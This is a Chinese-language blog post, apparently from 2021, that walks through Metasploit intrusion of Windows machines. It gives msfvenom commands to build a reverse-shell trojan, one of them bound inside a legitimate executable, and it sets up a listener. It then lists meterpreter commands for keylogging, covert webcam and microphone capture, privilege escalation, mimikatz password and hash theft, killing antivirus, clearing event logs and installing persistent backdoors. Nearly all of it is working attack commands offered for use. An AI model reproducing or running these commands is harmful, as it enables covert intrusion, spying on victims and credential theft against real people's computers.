内网渗透msf

msf

msf
它是一个免费的、可下载的框架,通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击。它本身附带数百个已知软件漏洞的专业级漏洞攻击工具。
原理:msfvenom是msfpayload,msfencode的结合体,它的优点是单一,命令行,和效率.利用msfvenom生成木马程序,并在目标机上执行,在本地监听上线。
操作
在kali系统里msf时安装好的。
此时我们去打开它。

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<本地IP> LPORT=<本地端口>  -f exe -o hacker.exe

上面的程序就可以生成木马了。

参数:

-p payloads

-f 输出格式

-o 输入地址

-e 编码方式(msfvenom -l -encoder 可以查看能使用的编码)

-x | -k 绑定程序 (例如 –x C:\nomal.exe –k –f exe –o C:\shell.exe)

还有一点需要补充ifconfig是可以查看自己电脑的ip地址的。直接输入msfconsole就可以打开msf了。
然后我们再在msf中去查看上钩的电脑。

msfconsole

打开msf

use exploit/multi/handler 

这样子选择模块
并且

set lhost 地址
set lport  端口 (这两个是去设置我们的地址和端口)
exploit -z -j (后台执行)

sessions 这个是查看上钩的用户,
sessions -i 1(选择需要攻击的用户,这里选择第 1 个)
然后就 shell (执行shell)这样子就能拿到命令行的窗口了。

进入meterpreter之后即可进行一些相关木马操作

首先可以查看帮助文档,命令“help”,挑常用操作来讲↓↓↓

------------------------------------------------------------------------------------------------

用户操作:Stdapi: User interface Commands(用户接口命令)

enumdesktops    -->列出所有可访问的桌面和窗口站(窗体列表)
getdesktop      -->得到当前的Meterpreter桌面

idletime        -->返回秒远程用户已经闲置数量

keyscan_start   -->开始捕获击键(开始键盘记录)
keyscan_dump    -->转储按键缓冲(下载键盘记录)
keyscan_stop    -->停止捕获击键(停止键盘记录)

PS:键盘记录注意点,先开始,后下载,再结束,否则会出错


screenshot      -->抓取交互式桌面截图(当前操作界面截图一张)
setdesktop      -->改变meterpreters当前桌面

uictl           -->控制一些用户界面组件(获取键盘、鼠标控制权)
使用uictl -h 查看帮助(打开/关闭,键盘/鼠标)


摄像头:Stdapi: Webcam Commands(摄像头命令)

record_mic       -->X秒从默认的麦克风record_mic音频记录(音频录制)


webcam_chat      -->开始视频聊天(视频,对方会有弹窗)
webcam_list      -->单摄像头(查看摄像头列表)


webcam_snap      -->采取快照从指定的摄像头(摄像头拍摄一张照片)
webcam_stream    -->播放视频流从指定的摄像头(开启摄像头监控)


其他命令操作

getsystem        -->获取高权限

hashdump         -->获取当前用户hash

meterpreter使用

1.clearev //清除日志
2.getsystem //提权
3.keyscan_start && keyscan_dump //记录键盘
4.migrate -p 2108 //迁移进程,如果失败,可尝试load stdapi
5.screenhot //截屏
6.download c:\users\1.txt /home/Desktop //下载,后面是自己的位置
7.upload /home/Desktop/1.php c:\users\desktop//上传,后面是靶机的位置。
8.execute -f notepad.exe //执行命令
9.shell //返回交互式命令行界面
10.load incognito //加载incognito
11.load powershell&&powershell_shell //加载powershell插件&&以Powershell的格式来提示而不是cmd的形式。
12.exploit/windows/local/registry_persistence
exploit/windows/local/vss_persistence
exploit/windows/local/s4u_persistence //利用给注册表加载shellcode,然后再用ps加载,运行meterpreter
13.load mimikatz //加载mimikatz
meterpreter > load mimikatz #加载mimikatz
meterpreter > msv #获取hash值
meterpreter > kerberos #获取明文
meterpreter >ssp #获取明文信息
meterpreter > wdigest #获取系统账户信息
meterpreter >mimikatz_command -f a:: #必须要以错误的模块来让正确的模块显示
meterpreter >mimikatz_command -f hash:: #获取目标 hash
meterpreter > mimikatz_command -f samdump::hashes
meterpreter > mimikatz_command -f sekurlsa::searchPasswords
14.run post/windows/gather/checkvm //查看是否是虚拟机
run post/windows/gather/smart_hashdump //查看hash
run post/windows/gather/enum_ie //查看浏览器的cookie,访问记录
run killav //关杀软进程
run vnc //检测对方桌面
run persistence -U -i 30 -p 2333 攻击机ip //维持权限 U用户登录时启动后门,X是系统启动时。 i是shell交互的时间

补充

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.108 -f exe -x /root/dy/.exe文件 -o /root/dy/.exe文件

上面这条命令是将其捆绑到一起。

-p:指定后面的payload

windows/meterpreter/reverse_tcp:申明这是一个windows系统下的一个反弹tcp

LHOST=192.168.0.108,:设置反弹回来的ip,即你的kali的ip地址

还可以设置返回的端口,这里就不设置了,默认返回端口是4444

-f: 代表要捆绑的文件类型,这里是一个exe文件

-x:指定你要捆绑的文件的路径及文件名。

-o:指定生成的木马文件的路径及文件名,这里我把它保存在原路径里。

下面又是我们找的一些资源(命令)

info                    #查看已有模块信息
getuid                  #查看权限
getpid                  #获取当前进程的pid
sysinfo                 #查看目标机系统信息
ps                      #查看当前活跃进程
kill <PID值>            #杀死进程
reboot / shutdown       #重启/关机shell #进入目标机cmd shell 
webcam_list             #查看摄像头
webcam_snap             #通过摄像头拍照
webcam_stream           #通过摄像头开启视频
execute                 #在目标机中执行文件execute -H -i -f 
cmd.exe                 #创建新进程cmd.exe,-H不可见,-i交互
migrate <pid值>         #将Meterpreter会话移植到指定pid值进程中
clearav                 #清除windows中的应用程序日志、系统日志、安全日志
enumdesktops            #查看可用的桌面
getdesktop              #获取当前meterpreter 关联的桌面
set_desktop             #设置meterpreter关联的桌面 -h查看帮助
screenshot              #截屏
use espia               #或者使用espia模块截屏 然后输入screengrab
run vnc                 #使用vnc远程桌面连接
posted @ 2021-02-14 17:17  望权栈  阅读(45)  评论(0编辑  收藏  举报  来源